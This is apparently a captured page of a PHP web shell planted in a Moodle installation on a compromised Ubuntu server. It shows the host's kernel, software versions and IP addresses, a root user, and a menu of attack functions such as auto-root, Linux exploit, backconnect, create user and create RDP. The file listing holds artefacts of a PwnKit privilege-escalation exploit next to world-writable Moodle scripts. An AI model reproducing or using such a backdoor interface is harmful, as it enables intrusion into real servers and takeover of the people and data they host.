Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
policy /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
acceptances_filter.min.js
1.86
KB
-rwxrwxrwx
acceptances_filter.min.js.map
7.1
KB
-rwxrwxrwx
acceptances_filter_datasource....
1.17
KB
-rwxrwxrwx
acceptances_filter_datasource....
4.52
KB
-rwxrwxrwx
acceptmodal.min.js
3.93
KB
-rwxrwxrwx
acceptmodal.min.js.map
13.29
KB
-rwxrwxrwx
jquery-eu-cookie-law-popup.min...
4.82
KB
-rwxrwxrwx
jquery-eu-cookie-law-popup.min...
13.02
KB
-rwxrwxrwx
managedocsactions.min.js
2.7
KB
-rwxrwxrwx
managedocsactions.min.js.map
7.51
KB
-rwxrwxrwx
policyactions.min.js
1.53
KB
-rwxrwxrwx
policyactions.min.js.map
5.25
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acceptances_filter_datasource.min.js
/** * Datasource for the tool_policy/acceptances_filter. * * This module is compatible with core/form-autocomplete. * * @package tool_policy * @copyright 2017 Jun Pataleta * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define("tool_policy/acceptances_filter_datasource",["jquery","core/ajax","core/notification"],(function($,Ajax,Notification){return{list:function(selector,query){var filteredOptions=[],el=$(selector),originalOptions=$(selector).data("originaloptionsjson"),selectedFilters=el.val();$.each(originalOptions,(function(index,option){return""!==query.trim()&&-1===option.label.toLocaleLowerCase().indexOf(query.toLocaleLowerCase())||$.inArray(option.value,selectedFilters)>-1||filteredOptions.push(option),!0}));var deferred=new $.Deferred;return deferred.resolve(filteredOptions),deferred.promise()},processResults:function(selector,results){var options=[];return $.each(results,(function(index,data){options.push({value:data.value,label:data.label})})),options},transport:function(selector,query,callback){this.list(selector,query).then(callback).catch(Notification.exception)}}})); //# sourceMappingURL=acceptances_filter_datasource.min.js.map
Close